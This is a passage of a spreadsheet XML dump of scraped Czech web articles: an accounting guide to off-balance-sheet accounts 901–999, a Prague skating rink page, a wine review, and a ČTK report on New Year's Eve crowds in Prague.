  <si>
    <t>901-998 - Podrozvahové účty Doc. Ing. Hana Březinová , CSc. , Zdroj: Verlag Dashöfer Doc. Ing. Hana Březinová , CSc. 901–998 – Podrozvahové účty 999 – Vyrovnávací účet k podrozvahovým účtům V případě skutečností, které jsou předmětem účetnictví, avšak nejsou splněny všechny podmínky pro provedení účetního zápisu v hlavní knize, účetní jednotka uvádí tyto skutečnosti na podrozvahových účtech v souladu s obsahovým vymezením podle § 49 až 54 vyhlášky č. 410/2009 Sb. , pokud náklady na získání informace nepřeváží přínosy plynoucí z této informace nebo se informace nepovažuje za významnou podle § 19 odst. 6 ZoÚ . Zápisy na podrozvahové účty provádí účetní jednotka jak v průběhu účetního období, tak k rozvahovému dni (ČÚS č. 701 bod 5.). Při posuzování skutečností podle § 25 odst. 2 a 3 ZoÚ účetní jednotka nejdříve posuzuje, zda jsou splněny podmínky pro účtování v knize podrozvahových účtů. V případě, že ano, účtuje o skutečnostech podle § 25 odst. 2 zákona v knize podrozvahových účtů až do okamžiku, kdy nejsou již splněny podmínky pro účtování v knize podrozvahových účtů. Při účtování na podrozvahové účty je specifickou podmínkou oceňování jednotlivých položek. Účetní jednotka postupuje podle § 72 vyhlášky č. 410/2009 Sb. : Krátkodobé podmíněné pohledávky a ostatní krátkodobá podmíněná aktiva se oceňují v předpokládané výši pohledávek a aktiv, které mohou vzniknout za stanovených podmínek krátkodobosti v souladu s § 48 odst. 6 vyhlášky. Dlouhodobé podmíněné pohledávky a ostatní dlouhodobá podmíněná aktiva se oceňují v předpokládané výši pohledávek a aktiv, které mohou vzniknout za stanovených podmínek dlouhodobosti v souladu s § 48 odst. 6 vyhlášky. Krátkodobé podmíněné závazky a ostatní krátkodobá podmíněná pasiva se oceňují v předpokládané výši dluhů a pasiv, které mohou vzniknout za stanovených podmínek krátkodobosti v souladu s § 48 odst. 6 vyhlášky. Dlouhodobé podmíněné závazky a ostatní dlouhodobá podmíněná pasiva se oceňují v předpokládané výši dluhů a pasiv, které mohou vzniknout za stanovených podmínek dlouhodobosti v souladu s § 48 odst. 6 vyhlášky. Dlouhodobé podmíněné pohledávky, ostatní dlouhodobá podmíněná aktiva, dlouhodobé podmíněné závazky a ostatní dlouhodobá podmíněná pasiva se ocení ke konci rozvahového dne. Zápisy v knize podrozvahových účtů se provádějí podvojně a souvztažně ( § 3 ZoÚ ). O majetku a závazcích účtuje účetní jednotka na stejné strany, jako by účtovala na aktivní a pasivní účty. Jako souvztažný účet použije technický účet 999 – Vyrovnávací účet k podrozvahovým účtům. Účetní zápisy uskutečňuje účetní jednotka na stranu MÁ DÁTI nebo na stranu DAL podrozvahového účtu, která je stejná jako při předcházejícím nebo následujícím zápisu na příslušný (související) účet v hlavní knize. Zápisy na účtu 999 se provádějí tak, že strana MÁ DÁTI zajišťuje podvojný zápis na straně DAL jiného podrozvahového účtu, a naopak. Zjistí-li účetní jednotka, že nejsou již splněny podmínky pro účtování v knize podrozvahových účtů a tato skutečnost zakládá povinnost provedení zápisu v hlavní knize, provádí se zápis v knize podrozvahových účtů a zápis v hlavní knize ve stejný okamžik (například jsou již splněny všechny podmínky pro účtování o pohledávce, a proto zanikají podmínky pro účtování o podmíněné pohledávce). Okamžik zápisů v těchto knihách je také stejný, pokud zanikl důvod pro zachycení určité skutečnosti v hlavní knize, a z toho důvodu je účtováno o snížení určité položky aktiva nebo pasiva, a zároveň byly splněny podmínky pro zápis v knize podrozvahových účtů (například uplynutím času došlo k promlčení pohledávky, avšak je zde předpoklad úhrady dluhu ručitelem nebo jsou splněny podmínky pro upuštění od vymáhání pohledávky podle jiného právního předpisu a zároveň účetní jednotka již nemá povinnost vykazovat pohledávku v rozvaze, avšak má povinnost tuto pohledávku nadále sledovat). Majetek účetní jednotky 901 – Jiný drobný dlouhodobý nehmotný majetek 902 – Jiný drobný dlouhodobý hmotný majetek 909 – Ostatní majetek Příklad účtování: Č. Text MD D Poznámka Vlastní poznámky 1. Zápis jiného drobného dlouhodobého nehmotného majetku na podrozvahové účty 901 999 jedná o nehmotný majetek s dobou použitelnosti delší než jeden rok v ocenění nižším než 7 000 Kč v jednotlivém případě 2. Zápis jiného drobného dlouhodobého hmotného majetku na podrozvahové účty 902 999 jedná o hmotný majetek s dobou použitelnosti delší než jeden rok v ocenění nižším než 3 000 Kč v jednotlivém případě Položka "P.I.1. Jiný drobný dlouhodobý nehmotný majetek" (účet 901) obsahuje podle § 49 písm. a) vyhlášky č. 410/2009 Sb. , majetek, který nesplňuje pouze podmínku dolní hranice pro vykazování v položce "A.I.5. Drobný dlouhodobý nehmotný majetek". Položka "P.I.2. Jiný drobný dlouhodobý hmotný majetek" (účet 902) obsahuje podle § 49 písm. b) vyhlášky č. 410/2009 Sb. , majetek, který nesplňuje pouze podmínku dolní hranice pro vykazování v položce "A.II.6. Drobný dlouhodobý hmotný majetek". Položka "P.I.5. Ostatní majetek" (účet 909) obsahuje podle § 49 písm. e) vyhlášky č. 410/2009 Sb. , majetek, který má účetní jednotka ve vlastnictví nebo jí přísluší hospodaření k tomuto majetku, který je předmětem účetnictví, ale není vykazován v rozvaze a není uveden na jiných podrozvahových účtech. Vyřazené pohledávky a závazky 905 – Vyřazené pohledávky Příklad účtování: Č. Text MD D Poznámka Vlastní poznámky 1. Zápis vyřazené pohledávky na podrozvahové účty 905 999 2. Zánik pohledávky nebo odpadly důvody vykazování 999 905 Položka "P.I.3. Vyřazené pohledávky" (účet 905) obsahuje podle § 49 písm. c) vyhlášky č. 410/2009 Sb. práva na peněžité plnění v případě, že již zanikl nárok účetní jednotky na vymáhání plnění (pohledávka je promlčená), ale je zde předpoklad, že dlužník svoji povinnost zcela nebo zčásti splní, nebo je zde předpoklad, že bude plněno jinou osobou (pohledávka nezanikla). Dále obsahuje pohledávky, které účetní jednotka již nevykazuje v rozvaze, ale z jiných právních předpisů nebo z potřeb účetní jednotky vyplývá potřeba jejich sledování. O vyřazených pohledávkách se účtuje podle ČÚS č. 706 bod 6.2 na Má dáti účtu 905 – Vyřazené pohledávky a na Dal účtu 999 – Vyrovnávací účet k podrozvahovým účtům. Poté, kdy dojde k zániku pohledávky nebo odpadnou důvody pro její vykazování v souladu s § 49 písm. c) vyhlášky, účtuje účetní jednotka dle ČÚS č. 706 bod 6.4. na stranu MÁ DÁTI podrozvahového účtu 999 – Vyrovnávací účet k podrozvahovým účtům se souvztažným zápisem na stranu DAL podrozvahového účtu 905 – Vyřazené pohledávky. 906 – Vyřazené závazky Položka "P.I.4. Vyřazené závazky" obsahuje podle § 49 písm. d) vyhlášky č. 410/2009 Sb. povinnosti k peněžitému plnění v případě, že již zanikl nárok věřitele na vymáhání plnění (závazek je promlčený), ale je zde předpoklad, že účetní jednotka svoji povinnost zcela nebo zčásti splní (závazek nezanikl). Dále obsahuje závazky, které účetní jednotka již nevykazuje v rozvaze, ale z jiných právních předpisů nebo z potřeb účetní jednotky vyplývá potřeba jejich sledování. 909 – Ostatní majetek Položka "P.I.5. Ostatní majetek“ obsahuje podle § 49 písm. e) vyhlášky č. 410/2009 Sb. majetek, který má účetní jednotka ve vlastnictví nebo jí přísluší hospodaření k tomuto majetku, který je předmětem účetnictví, ale není vykazován v rozvaze a není uveden na jiných podrozvahových účtech. Dále u zřizovatele obsahuje majetek, který zřizovatel předal příspěvkové organizaci k hospodaření podle § 27 odst. 2 písm. e) zákona č. 250/2000 Sb. , pokud tento majetek zřizovatel nevykazuje v rozvaze. Na tomto účtu lze také zaúčtovat předmět finančního leasingu do doby, než je smlouva ukončena odkoupením předmětu leasingu. Podstatou smluv o finančním leasingu je pronájem určitého majetku s jeho následnou koupí nájemcem po uplynutí doby pronájmu. Česká účetní legislativa požaduje, aby předmět leasingu byl vykazován v rozvaze pronajímatele, který jej také odpisuje. Nájemce do doby odkupu předmětu finančního leasingu vykazuje majetek na podrozvahových účtech, majetek neodpisuje a pouze platí nájemné pronajímateli. Krátkodobé podmíněné pohledávky z transferů a krátkodobé podmíněné závazky z transferů 913 – Krátkodobé podmíněné pohledávky ze zahraničních transferů Podle ČÚS č. 703 bod 4.5. příjemce transferu, jehož poskytovatelem je subjekt se sídlem v zahraničí, účtuje o podmíněné pohledávce na podrozvahových účtech v okamžiku, kdy podal žádost o tento transfer nebo došlo k jiné skutečnosti, která je natolik určitá, že zakládá možnost poskytnutí nebo zprostředkování určitého transferu příjemci, a to prostřednictvím účtu 913 – Krátkodobé podmíněné pohledávky ze zahraničních transferů a účtu 999 – Vyrovnávací účet k podrozvahovým účtům. Položka "P.II.3. Krátkodobé podmíněné pohledávky ze zahraničních transferů" obsahuje u příspěvkových organizací krátkodobé předpokládané pohledávky z titulu dotací, grantů, příspěvků, subvencí, dávek, nenávratných finančních výpomocí, podpor či peněžních darů, a to za subjekty se sídlem v zahraničí. Příklad účtování: Č. Text MD D Poznámka 1. Pohledávka za poskytovatelem neinvestiční dotace ze zahraničí 913 999 Účtování na straně příjemcedle ČÚS č. 3, bod 4.5. 2. Snížení/zrušení podmíněné pohledávky 999 913 dle ČÚS č. 3, bod 4.10. 914 – Krátkodobé podmíněné závazky ze zahraničních transferů Podle ČÚS č. 703 bod 4.1. pokud zjistí poskytovatel, že došlo ke skutečnosti, která je natolik určitá a významná, že zakládá možnost poskytnutí transferu, jehož příjemcem je subjekt se sídlem v zahraničí, účtuje o této skutečnosti prostřednictvím účtu 914 – Krátkodobé podmíněné závazky ze zahraničních transferů a účtu 999 – Vyrovnávací účedt k podrozvahovým účtům. 915 – Ostatní krátkodobé podmíněné pohledávky z transferů Podle ĆÚS č. 703 bod 4.6. pokud zjistí příjemce, že došlo ke skutečnosti, která je natolik určitá a významná, že zakládá možnost poskytnutí transferu neuvedeného v ČÚS č. 703 bod 4.5., účtuje o této skutečnosti prostřednictvím účtu 915 – Ostatní krátkodobé podmíněné pohledávky z transferů a účtu 999 – Vyrovnávací účet k podrozvahovým účtům. Položka P.II.5. obsahuje u příspěvkových organizací krátkodobé předpokládané pohledávky z titulu dotací, grantů, příspěvků, subvencí, dávek, nenávratných finančních výpomocí, podpor či peněžních darů, a to za ostatními subjekty. Příklad účtování: Č. Text MD D Poznámka Vlastní poznámky 1. Pohledávka za poskytovatelem neinvestiční dotace z tuzemska 915 999 Účtování na straně příjemcedle ČÚS č. 3, bod 4.6. 2. Snížení/zrušení podmíněné pohledávky 999 915 dle ČÚS č. 3, bod 4.10. 916 – Ostatní krátkodobé podmíněné závazky z transferů Položka “P.II.6. Ostatní krátkodobé podmíněné závazky z transferů“ (účet 916) obsahuje krátkodobé předpokládané závazky z titulu dotací, grantů, příspěvků, subvencí, dávek, nenávratných finančních výpomocí, podpor či peněžních darů neuvedených v jiných položkách. Podmíněné pohledávky z důvodu užívání majetku jinou osobou 921 – Krátkodobé podmíněné pohledávky z důvodu úplatného užívání majetku jinou osobou Položka "P.III.1. Krátkodobé podmíněné pohledávky z důvodu úplatného užívání majetku jinou osobou" obsahuje podle § 51 písm. a) vyhlášky č. 410/2009 Sb. , krátkodobé budoucí pohledávky z titulu případné nemožnosti vrácení majetku účetní jednotky úplatně užívaného jinou osobou, například z důvodu zničení nebo odcizení nebo z důvodu významného znehodnocení tohoto majetku, a to ve výši případného peněžitého plnění vůči účetní jednotce. 922 – Dlouhodobé podmíněné pohledávky z důvodu úplatného užívání majetku jinou osobou Položka "P.III.2. Dlouhodobé podmíněné pohledávky z důvodu úplatného užívání majetku jinou osobou" obsahuje podle § 51 písm. b) vyhlášky č. 410/2009 Sb. , dlouhodobé budoucí pohledávky z titulu případné nemožnosti vrácení majetku účetní jednotky úplatně užívaného jinou osobou, například z důvodu zničení nebo odcizení nebo z důvodu významného znehodnocení tohoto majetku, a to ve výši případného peněžitého plnění vůči účetní jednotce. 923 – Krátkodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou na základě smlouvy o výpůjčce Položka "P.III.3. Krátkodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou na základě smlouvy o výpůjčce" obsahuje podle § 51 písm. c) vyhlášky č. 410/2009 Sb. , krátkodobé budoucí pohledávky z titulu případné nemožnosti vrácení majetku účetní jednotky užívaného jinou osobou na základě smlouvy o výpůjčce, například z důvodu zničení nebo odcizení nebo z důvodu významného znehodnocení tohoto majetku, a to ve výši případného peněžitého plnění vůči účetní jednotce. Smlouvu o výpůjčce upravuje zákon č. 89/2012 Sb. , občanský zákoník, ve znění pozdějších předpisů v § 2193 až § 2200 . Na základě ustanovení těchto paragrafů smlouvou o výpůjčce půjčitel přenechává vypůjčiteli nezuživatelnou věc a zavazuje se mu umožnit její bezplatné dočasné užívání. Vypůjčenou věc lze vrátit i předčasně, pokud by však půjčiteli vznikly obtíže, může tak být jen s jeho souhlasem. Vypůjčitel nese obvyklé náklady spojené s užíváním věci. 924 – Dlouhodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou na základě smlouvy o výpůjčce Položka "P.III.4. Dlouhodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou na základě smlouvy o výpůjčce" obsahuje podle § 51 písm. d) vyhlášky č. 410/2009 Sb. , dlouhodobé budoucí pohledávky z titulu případné nemožnosti vrácení majetku účetní jednotky užívaného jinou osobou na základě smlouvy o výpůjčce, například z důvodu zničení nebo odcizení nebo z důvodu významného znehodnocení tohoto majetku, a to ve výši případného peněžitého plnění vůči účetní jednotce. Smlouvu o výpůjčce upravuje zákon č. 89/2012 Sb. , občanský zákoník, ve znění pozdějších předpisů v § 2193 až § 2200 . Na základě ustanovení těchto paragrafů smlouvou o výpůjčce půjčitel přenechává vypůjčiteli nezuživatelnou věc a zavazuje se mu umožnit její bezplatné dočasné užívání. Vypůjčenou věc lze vrátit i předčasně, pokud by však půjčiteli vznikly obtíže, může tak být jen s jeho souhlasem. Vypůjčitel nese obvyklé náklady spojené s užíváním věci. 925 – Krátkodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou z jiných důvodů Položka "P.III.5. Krátkodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou z jiných důvodů" obsahuje podle § 51 písm. e) vyhlášky č. 410/2009 Sb. , krátkodobé budoucí pohledávky z titulu případné nemožnosti vrácení majetku účetní jednotky užívaného jinou osobou z důvodu povinností stanovených jinými právními předpisy nebo z jiného důvodu neuvedeného v § 51 písm. a) a c) vyhlášky č. 410/2009 Sb. , například z důvodu zničení nebo odcizení nebo z důvodu významného znehodnocení tohoto majetku, a to ve výši případného peněžitého plnění vůči účetní jednotce. 926 – Dlouhodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou z jiných důvodů Položka "P.III.6. Dlouhodobé podmíněné pohledávky z důvodu užívání majetku jinou osobou z jiných důvodů" obsahuje podle § 51 písm. f) vyhlášky č. 410/2009 Sb. , dlouhodobé budoucí pohledávky z titulu případné nemožnosti vrácení majetku účetní jednotky užívaného jinou osobou z důvodu povinností stanovených jinými právními předpisy nebo z jiného důvodu neuvedeného v § 51 písm. b) a d) vyhlášky č. 410/2009 Sb. , například z důvodu zničení nebo odcizení nebo z důvodu významného znehodnocení tohoto majetku, a to ve výši případného peněžitého plnění vůči účetní jednotce. Další podmíněné pohledávky 931 – Krátkodobé podmíněné pohledávky ze smluv o prodeji dlouhodobého majetku Položka "P.IV.1. Krátkodobé podmíněné pohledávky ze smluv o prodeji dlouhodobého majetku" obsahuje podle § 52 písm. a) vyhlášky č. 410/2009 Sb. , krátkodobé budoucí pohledávky z titulu plnění z uzavřených smluv týkajících se prodeje dlouhodobého majetku, například zálohy a závdavky nebo splátky. 932 – Dlouhodobé podmíněné pohledávky ze smluv o prodeji dlouhodobého majetku Položka "P.IV.2. Dlouhodobé podmíněné pohledávky ze smluv o prodeji dlouhodobého majetku" obsahuje podle § 52 písm. b) vyhlášky č. 410/2009 Sb. , dlouhodobé budoucí pohledávky z titulu plnění z uzavřených smluv týkajících se prodeje dlouhodobého majetku, například zálohy a závdavky nebo splátky. 933 – Krátkodobé podmíněné pohledávky z jiných smluv Položka "P.IV.3. Krátkodobé podmíněné pohledávky z jiných smluv" obsahuje podle § 52 písm. c) vyhlášky č. 410/2009 Sb. , krátkodobé budoucí pohledávky z titulu plnění z uzavřených smluv, s výjimkou smluv podle písmene § 52 písm. a) vyhlášky č. 410/2009 Sb. , například z titulu nájemného nebo pachtovného. 934 – Dlouhodobé podmíněné pohledávky z jiných smluv Položka "P.IV.4. Dlouhodobé podmíněné pohledávky z jiných smluv" obsahuje podle § 52 písm. d) vyhlášky č. 410/2009 Sb. , dlouhodobé budoucí pohledávky z titulu plnění z uzavřených smluv, s výjimkou smluv podle § 52 písm. b) vyhlášky č. 410/2009 Sb. , například z titulu nájemného nebo pachtovného. Příklad účtování: Č. Text MD D Poznámka Vlastní poznámky 1. Zápis krátkodobých pohledávek, které vznikly z titulu plnění uzavřených nájemních smluv na podrozvahové účty 933 999 2. Zápis dlouhodobých pohledávek, které vznikly z titulu plnění uzavřených nájemních smluv na podrozvahové účty 934 999 942 – Krátkodobé podmíněné pohledávky ze vztahu k jiným zdrojům Položka "P.IV.7. Krátkodobé podmíněné pohledávky ze vztahu k jiným zdrojům" obsahuje podle § 52 písm. g) vyhlášky č. 410/2009 Sb. , krátkodobé předpokládané pohledávky nebo příjmy nejsou uvedeny v § 52 písm. e) a i) vyhlášky č. 410/2009 Sb. a které mají vzniknout na základě individuálních rozhodnutí příslušných orgánů státní správy nebo samosprávy nebo mohou vzniknout na základě jiného projevu vůle jiné osoby, například granty a dary. 943 – Dlouhodobé podmíněné pohledávky ze vztahu k jiným zdrojům Položka "P.IV.8. Dlouhodobé podmíněné pohledávky ze vztahu k jiným zdrojům" obsahuje podle § 52 písm. h) vyhlášky č. 410/2009 Sb. , dlouhodobé předpokládané pohledávky nebo příjmy nejsou uvedeny v § 52 písm. f) a j) vyhlášky č. 410/2009 Sb. a které mají vzniknout na základě individuálních rozhodnutí příslušných orgánů státní správy nebo samosprávy nebo mohou vzniknout na základě jiného projevu vůle jiné osoby, například granty a dary. 944 – Krátkodobé podmíněné úhrady pohledávek z přijatých zajištění Položka "P.IV.9. Krátkodobé podmíněné úhrady pohledávek z přijatých zajištění" obsahuje podle § 52 písm. i) vyhlášky č. 410/2009 Sb. , výši krátkodobých možných plnění jinou osobou nebo státem za účetní jednotku ke kterým se tyto osoby nebo stát zavázaly z titulu poskytnutí zástavy nebo jiného zajištění. 945 – Dlouhodobé podmíněné úhrady pohledávek z přijatých zajištění Položka "P.IV.10. Dlouhodobé podmíněné úhrady pohledávek z přijatých zajištění" obsahuje podle § 52 písm. j) vyhlášky č. 410/2009 Sb. , výši dlouhodobých možných plnění jinou osobou nebo státem za účetní jednotku, ke kterým se tyto osoby nebo stát zavázaly z titulu poskytnutí zástavy nebo jiného zajištění. 947 – Krátkodobé podmíněné pohledávky ze soudních sporů, správních řízení a jiných řízení Položka "P.IV.11. Krátkodobé podmíněné pohledávky ze soudních sporů, správních řízení a jiných řízení" obsahuje podle § 52 písm. k) vyhlášky č. 410/2009 Sb. , krátkodobé budoucí nároky na plnění na základě individuálních rozhodnutí příslušných orgánů státní správy, samosprávy nebo soudů, pokud příslušné řízení již bylo zahájeno. 948 – Dlouhodobé podmíněné pohledávky ze soudních sporů, správních řízení a jiných řízení Položka "P.IV.12. Dlouhodobé podmíněné pohledávky ze soudních sporů, správních řízení a jiných řízení" obsahuje podle § 52 písm. l) vyhlášky č. 410/2009 Sb. , dlouhodobé budoucí nároky na plnění na základě individuálních rozhodnutí příslušných orgánů státní správy, samosprávy nebo soudů, pokud příslušné řízení již bylo zahájeno. Dlouhodobé podmíněné pohledávky z transferů a dlouhodobé podmíněné závazky z transferů 953 – Dlouhodobé podmíněné pohledávky ze zahraničních transferů Podle ĆÚS č. 703 bod 4.5. příjemce transferu, jehož poskytovatelem je subjekt se sídlem v zahraničí, účtuje o podmíněné pohledávce na podrozvahových účtech v okamžiku, kdy podal žádost o tento transfer nebo došlo k jiné skutečnosti, která je natolik určitá, že zakládá možnost poskytnutí nebo zprostředkování určitého transferu příjemci, a to prostřednictvím účtu 953 – Dlouhodobé podmíněné pohledávky ze zahraničích transferů a účtu 999 – Vyrovnávací účet k podrozvahovým účtům. Položka P.V.3. obsahuje dlouhodobé předpokládané pohledávky z titulu dotací, grantů, příspěvků, subvencí dávek, nenávratných finančních výpomocí, podpor či peněžních darů, a to za subjekty se sídlem v zahraničí. Příklad účtování: Č. Text MD D Poznámka Vlastní poznámky 1. Pohledávka za poskytovatelem neinvestiční dotace ze zahraničí 953 999 Účtování na straně příjemcedle ČÚS č. 3, bod 4.5. … Autor: Hana Březinová Autor person Hana Březinová</t>
  </si>
  <si>
    <t>20250101_397_3693013199_34bf86edf7f0f49b1062.html</t>
  </si>
  <si>
    <t>34bf86edf7f0f49b1062</t>
  </si>
  <si>
    <t>Kluziště Nábřeží</t>
  </si>
  <si>
    <t>Kluziště Nábřeží Kluziště na nábřeží Vltavy . O kluzišti Provozovatelem kluziště je Dům dětí a mládeže Prahy 5 . Půjčovna bruslí Otevřeno v provozním čase kluziště od 9:00 do 21:00 hod. Lze zapůjčit brusle pro děti a dospělé, kačenky pro děti, helmy a hrazdičky. Na půjčovně lze zapůjčit klíče od úschovných boxů. Občerstvení Široká nabídka teplých a studených nápojů. Pro zahřátí dobře poslouží svařák, punč, čaj a nebo čerstvě pražená káva. Nebude samozřejmě chybět čepované pivo , párek v rohlíku a donuty pro děti. Otevírací doba Bruslení pro veřejnost: Po - Pá 12:00 - 21:00 So - Ne 9:00 - 21:00 Bruslení pro školy a školky Po - pá 9:00 - 12:00 Soukromé rezervace: Po - Ne 21:00 do 22:00. Autor: Karel Zavadil Autor person Karel Zavadil</t>
  </si>
  <si>
    <t>20250101_398_3699349728_44ba216df7c32521bcbd.html</t>
  </si>
  <si>
    <t>44ba216df7c32521bcbd</t>
  </si>
  <si>
    <t>Dobrá vína, která stojí za ochutnání: Vinné menu z burgundských odrůd</t>
  </si>
  <si>
    <t>Dobrá vína , která stojí za ochutnání: Vinné menu z burgundských odrůd 1. 1. 2025 První článek v novém roce se vlastně ještě vrací k hodnocení z roku minulého. Proto si uděláme takové „vinné menu" různých typů vín, která by mohla fungovat i v rámci jedné příležitosti. Spojovat je bude rodina burgundských odrůd, které můžeme také nazvat jako „pinotové". Tip vínomilců – Bohemia Sekt Prestige Chardonnay brut, Bohemia Sekt Podruhé za sebou zmiňujeme jako první víno to s bublinkami a není to určitě náhodou. Jednak je k tomu příhodná doba, většina populace si sekty dopřeje právě v prosinci, ale také se rozšiřuje jejich nabídka a zvyšuje kvalita. Ostatně tuzemsko by mělo být pro tvorbu sektů celkem ideální zemí. Náš největší producent má v portfoliu hned několik druhů sektů kvašených v lahvi. U nich vždy garantuje původ suroviny z území České republiky , což neplatí o „základech" kvašených v tanku. Jediným běžným jednoodrůdovým sektem kvašeným v lahvi pod značkou Bohemia Sektu je Chardonnay v řadě Prestige. Ležení na kalech se většinou pohybuje v rozmezí 12 a 18 měsíců. Všechny šarže mohou zaujmout celkem výraznou odrůdovou ovocnou aromatikou. Už variabilní pak je bohatost těla a celková harmonie sektu. „Ideální volba pro štědrovečerní hostinu, velká spokojenost za mě i ostatní. Jemné perlení, ve vůni i chuti sadové ovoce, šťavnaté, pěkné," napsal o své poslední zkušenosti s šarží 22041B Tycka. Sektu, který loni soutěžil v rámci slovácké podoblasti, přisoudil 87 bodů. Tip vínomilců – Pinot gris 2023 zemské víno , Mělnické vinařství Kraus Zatímco Chardonnay je v Čechách spíše marginální odrůdou, Rulandské šedé je vůbec tou nejpěstovanější v rámci bílých pinotových odrůd. Dokonce mu co se týče rozlohy patří za Müllerem Thurgau a Ryzlinkem rýnským třetí příčka mezi všemi bílými odrůdami. Přesto není mezi pinoty jedničkou, ještě častěji se tu totiž pěstuje Rulandské modré. Také v portfoliu Mělnického vinařství Kraus je za Pinotem noir trochu v ústraní, zde pochopitelně i za Ryzlinkem rýnským, který je ve vinařství vlajkovou lodí. Šeďák standardně najdeme pouze v jedné řadě. V té střední s klasickým šroubovým uzávěrem a zelenkavou etiketou. „Středně koncentrovaná ovocná vůně, broskve, žlutá jablka, chlebová kůrka. Chuť je šťavnatá, lehce pikantní, minerálně ovocná, převládají tóny zralého sadového ovoce, pěkná kyselina a středně dlouhá minerální dochuť. Hezké, vybalancované víno z této odrůdy, kvalitní surovina, umění vinaře a otisk severního terroir mělnické vinařské podoblasti," popsal ročník 2023 Davinpak. Zasloužilo si od něj 88 bodů. Tip vínomilců – Pinot noir 2019 výběr z hroznů, Tanzberg Po sektu a suchém bílém víně se pochopitelně nabízí zakončit vínem červeným. Rulandské modré je třetí nejpěstovanější modrou odrůdou u nás. Její výsadní postavení v Čechách jsme už zmiňovali, na Moravě ji globálně poráží Frankovka a Svatovavřinecké. Konkrétně na Mikulovsku jí ale patří místo druhé hned za Frankovkou. Vinařství Tanzberg z Bavor ji má jako jednu ze dvou klíčových modrých odrůd. Vsadilo na světově známé odrůdy Cabernet Sauvignon a právě Pinot noir. Jak už je u tohoto vinařství zvykem, jde zpravidla o vína na delší trať a to téměř bez ohledu na ročník a tvůrce, kteří se poslední roky ve vinařství celkem střídají. „Ve vůni silné malinové tóny, až do matolin z mačkání malinové šťávy, jak to dělala moje babička. Nejdřív zavřené, alkoholové . Poté komplexní, ovocitě kávové, na příjemné kyselince stojící sošné víno . Příjemná zjemnělá tříslovina. Transformované třešně. Krásné a silné tělo a komplexní doznívání," pochvaloval si Tatínek má velké bříško. Nadšení dal najevo 93 body. Chcete vědět, co zrovna ochutnáváme my nebo jaké větší články pro vás chystáme? Staňte se našimi fanoušky na Herohero! Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_399_3692936081_a3699638d3d6d5719c81.html</t>
  </si>
  <si>
    <t>a3699638d3d6d5719c81</t>
  </si>
  <si>
    <t>V centru Prahy je před příchodem Nového roku mnoho lidí, zatím je klid</t>
  </si>
  <si>
    <t>V centru Prahy je před příchodem Nového roku mnoho lidí, zatím je klid Silvestrovské přípravy, 31.prosince 2024, Praha . Speciální zdravotnický modul Golem na Staroměstském náměstí . CTK/Šulová Kateřina Praha - V historickém centru Prahy byl ve večerních hodinách před příchodem Nového roku klid. Stále více lidí směřovalo na Staroměstské náměstí , část z nich je ale také ve spodní části náměstí Václavského. V horní části většímu srocení lidí brání stavba, která prostor rozděluje. Záchranáři ani strážníci zatím neevidovali žádná závažnější zranění ani přestupky. Sporadicky se ozýval hluk z pyrotechniky, která je od roku 2020 ve středu metropole zakázána. Případná zranění a přestupky záchranáři a strážníci očekávají v pozdějších hodinách. Na Staroměstském náměstí bylo podle odhadů pracovníků bezpečnostních složek více lidí než v minulých letech. Důvodem podle nich je, že staveniště na Václavském náměstí , které je tradičně centrem v době silvestrovských oslav, odrazuje řadu turistů. Na tom se přitom kvůli jeho větší ploše skupinky lidí lépe rozmělní a nesoustřeďují se na jednom místě. Do centra hlavního města v odpoledních hodinách vyrazili odpoledne před začátkem oslav hlavně cizinci. Do Prahy podle odhadu Prague City Tourism ( PCT ), městské firmy, která má na starosti cestovní ruch, zamířilo asi 100.000 turistů. Loni to bylo 90.000 návštěvníků. V ulicích zněla především angličtina, němčina, italština, ruština a ukrajinština. Značnou část lidí chladné počasí zahnalo do kaváren a restaurací. Večer se ale již na tradičně nejfrekventovanějších místech Prahy častěji objevovali i Češi. Restaurace byly večer většinou plné nebo z větší části zarezervované. "Všechny rezervace jsme měli plné již několik dní dopředu. Bez rezervace není šance sehnat místo pro více lidí," řekl ČTK obsluhující v jedné z restaurací poblíž Staroměstského náměstí . Na Staroměstském náměstí turisté večer podobně jako odpoledne převážně navštěvovali stánky na vánočních trzích. Kvůli chladnému počasí, na které si v mnoha případech stěžovali, pak konzumovali hlavně čaje, svařená vína a další teplé nápoje. Večer pak začal na náměstí silvestrovský program na provizorním pódiu. Až do půlnoci se zde budou střídat česko-britská poprocková kapela So fine a DJ Jan Meruna. O atmosféru v centru města se staralo také několik pouličních muzikantů. Stovky turistů každou celou hodinu čekaly pod orlojem, až se ozve zvonek a začne defilé apoštolů. Pražská zdravotnická záchranná služba v tiskové zprávě uvedla, že v hlavním městě posiluje svůj provoz ve večerních a ranních hodinách. Přibližně v 15:00 na Staroměstské náměstí dorazilo záchranářské vozidlo Golem. Každoročně ošetřuje například lidi poraněné pyrotechnikou a má možnost ošetřit pacienty až na 12 lůžkách. Na náměstí pak budou umístěny tři další záchranářské posádky, aby se pomoci pacientům na zaplněném náměstí dostalo co nejdříve. "Zatím jsme ošetřili jen drobné úrazy a následky požití alkoholu," sdělil ČTK Ondřej Šedivka, mluvčí záchranářského vozidla Golem. Na Václavském náměstí byly večer dva záchranné vozy. Vzhledem k rozsáhlým stavebním pracím ale letos záchranáři nepředpokládají takovou intenzitu novoročních oslav, jak bývá obvyklé. Stavba v horní části náměstí značně komplikuje pohyb a prakticky ho rozděluje na dvě části. Z jedné strany na druhou lze procházet pouze v některých místech. Také zde byl večer podobně jako v odpoledních hodinách provoz jako o běžném víkendu v roce. Přilehlé restaurace a prodejny rychlého občerstvení byly zaplněné. Na novoroční oslavy dohlíží ve zvýšených počtech i policie. Tisíce policistů v celé republice dohlédnou na bezpečnost při nadcházejících oslavách příchodu nového roku. Zaměří se na frekventovaná místa i takzvané měkké cíle, což jsou například obchodní centra, letiště, nádraží a další prostory s značnou koncentrací lidí a nízkou úrovní zabezpečení. Na Staroměstském a na Václavském náměstí již odpoledne hlídkovali policisté s dlouhými zbraněmi. Večer se jejich počet zvýšil. Ozbrojení policisté pak hlídkovali také v okolních ulicích, například v ulici Pařížská a v nedalekém Josefově , kde jsou židovské památky. ČR zábava zdraví hasiči policie silvestr oslavy Praha Autor: ČTK, Kateřina Šulová Autoři ČTK person Kateřina Šulová</t>
  </si>
  <si>
